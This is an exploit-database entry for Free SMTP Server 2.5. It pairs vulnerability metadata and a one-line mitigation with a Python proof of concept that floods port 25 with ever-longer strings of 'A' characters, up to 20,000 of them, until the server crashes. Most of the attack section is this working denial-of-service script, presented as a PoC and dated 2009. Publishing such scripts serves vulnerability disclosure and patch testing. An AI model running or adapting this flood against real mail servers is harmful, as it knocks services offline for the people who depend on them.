Free SMTP Server - Local Denial of Service Crash (PoC)

vendor:

Free SMTP Server

by:

Metin Kandemir (kandemir)

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Free SMTP Server

Affected Version From: 2.5

Affected Version To: 2.5

Patch Exists: YES

Related CWE: N/A

CPE: //a:free_smtp_server:2.5

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 Service Pack 1 x64

2009

Free SMTP Server – Local Denial of Service Crash (PoC)

The SMTP Server will crash when a malicious code is run on localhost. The code creates a buffer of strings and sends them to the server, causing it to crash.

Mitigation:

Ensure that the SMTP server is running the latest version of the software and that all security patches are applied.

Source

Exploit-DB raw data:

#Exploit Title: Free SMTP Server - Local Denial of Service Crash (PoC)
# Date: February 3, 2009
# Exploit Author: Metin Kandemir (kandemir)
# Vendor Homepage: http://www.softstack.com/freesmtp.html
# Software Link: https://free-smtp-server.en.uptodown.com/windows/download
# Version: 2.5
# Tested on: Windows 7 Service Pack 1 x64
# Software Description : Free SMTP server program to send emails directly from PC.
# ==================================================================
# The SMTP Server will crash when this code is run on localhost. 

import socket

a=1
buffer = ["A"]
while a <= 20000:
        a = a+1
        buffer.append("A"*a)


for string in buffer:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connect =  s.connect(('127.0.0.1',25))
        s.send(string)